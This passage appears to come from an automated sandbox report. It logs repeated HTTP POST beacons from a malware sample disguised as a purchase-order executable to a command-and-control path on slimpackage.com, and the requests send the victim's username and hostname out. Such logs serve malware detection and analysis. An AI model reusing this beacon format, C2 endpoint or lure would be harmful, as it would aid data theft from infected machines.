                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:30.577229977 CET1345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:30.710796118 CET1345INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:29 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.449776104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:31.824330091 CET1346OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:31.946741104 CET1347OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:32.075763941 CET1347INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:30 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.449777104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:33.100122929 CET1348OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:33.222616911 CET1348OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:33.355024099 CET1348INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:32 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.449778104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:35.394366026 CET1350OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:35.520056009 CET1363OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:35.667382956 CET1372INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:34 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.449781104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:37.781119108 CET1373OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:37.903804064 CET1373OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:38.033628941 CET1374INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:36 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.449782104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:40.339952946 CET1375OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:40.463958979 CET1375OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:40.607796907 CET1375INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:39 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.449783104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:43.210043907 CET1376OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:43.332705021 CET1376OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:43.464898109 CET1376INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:42 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.449784104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:44.685173988 CET1377OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:44.809154034 CET1378OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:44.943876982 CET1378INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:43 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    18192.168.2.449785104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:46.279601097 CET1379OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:46.403915882 CET1379OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:46.535479069 CET1379INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:45 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    19192.168.2.449786104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:48.680702925 CET1380OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:48.805205107 CET1380OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:48.940790892 CET1381INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:47 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.449767104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:17.010469913 CET1247OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:17.134681940 CET1247OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:17.266379118 CET1247INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:16 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    20192.168.2.449787104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:51.278645992 CET1381OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:51.496203899 CET1382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:51.711889029 CET1382INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:50 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    21192.168.2.449788104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:52.910922050 CET1383OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:53.033909082 CET1383OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:53.164037943 CET1383INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:52 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    22192.168.2.449789104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:54.384953022 CET1384OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:54.510684967 CET1385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:54.642054081 CET1385INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:53 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    23192.168.2.449790104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:56.404035091 CET1386OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:56.530853033 CET1386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:56.687561035 CET1387INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:55 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    24192.168.2.449791104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:58.873327017 CET1388OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:15:58.997903109 CET1388OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:15:59.129765034 CET1388INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:15:58 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    25192.168.2.449792104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:01.632257938 CET1389OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:01.756613016 CET1389OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:02.004981041 CET1389INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:00 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    26192.168.2.449793104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:03.275393009 CET1390OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:03.397876978 CET1391OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:03.527699947 CET1391INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:02 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    27192.168.2.449794104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:04.521631956 CET1392OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:04.644192934 CET1392OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:04.775456905 CET1392INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:03 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    28192.168.2.449795104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:05.921415091 CET1393OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:06.043971062 CET1393OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:06.174947023 CET1394INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:05 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    29192.168.2.449797104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:16:07.332344055 CET1473OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
                    Jan 14, 2022 07:16:07.455298901 CET1486OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 34 00 37 00 35 00 32 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                    Data Ascii: (ckav.rujones247525DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Jan 14, 2022 07:16:07.593718052 CET1521INHTTP/1.1 200 OK
                    Date: Fri, 14 Jan 2022 06:16:06 GMT
                    Server: Apache
                    Connection: close
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    3192.168.2.449768104.223.93.10580C:\Users\user\Desktop\Purchase Order #5000012803.exe
                    TimestampkBytes transferredDirectionData
                    Jan 14, 2022 07:15:18.393620968 CET1248OUTPOST /slimfit/five/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: slimpackage.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: AF753E12
                    Content-Length: 163
                    Connection: close
